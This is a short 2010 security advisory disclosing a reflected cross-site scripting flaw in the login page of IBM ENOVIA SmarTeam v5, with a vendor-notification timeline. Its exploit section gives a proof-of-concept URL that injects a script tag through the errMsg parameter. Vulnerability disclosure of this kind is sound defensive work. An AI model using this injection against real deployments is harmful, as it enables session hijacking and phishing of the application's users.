========================================= Yaniv Miron aka "Lament" Advisory March 7, 2010 IBM ENOVIA SmarTeam v5 Cross Site Scripting Vulnerability ========================================= ===================== I. BACKGROUND ===================== ENOVIA SmarTeam provides highly flexible product data management and mission-critical business process management. It helps your team optimally leverage product knowledge, driving collaboration across the enterprise and value chain. http://www-01.ibm.com/software/applications/plm/smarteam/ ===================== II. DESCRIPTION ===================== A malicious attacker may inject scripts into the IBM ENOVIA SmarTeam application. ===================== III. ANALYSIS ===================== Exploitation of this vulnerability results in the execution of arbitrary code using a malicious link. ===================== IV. EXPLOIT ===================== http://example.com/WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2f WebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts. "><script>alert('XSS-By-Lament')</script> ===================== V. DISCLOSURE TIMELINE ===================== Jan 2009 Vulnerability Found Jan 2009 Vendor Notification March 2010 Public Disclosure ===================== VI. CREDIT ===================== Yaniv Miron aka "Lament". lament (at) ilhack (dot) org [email concealed]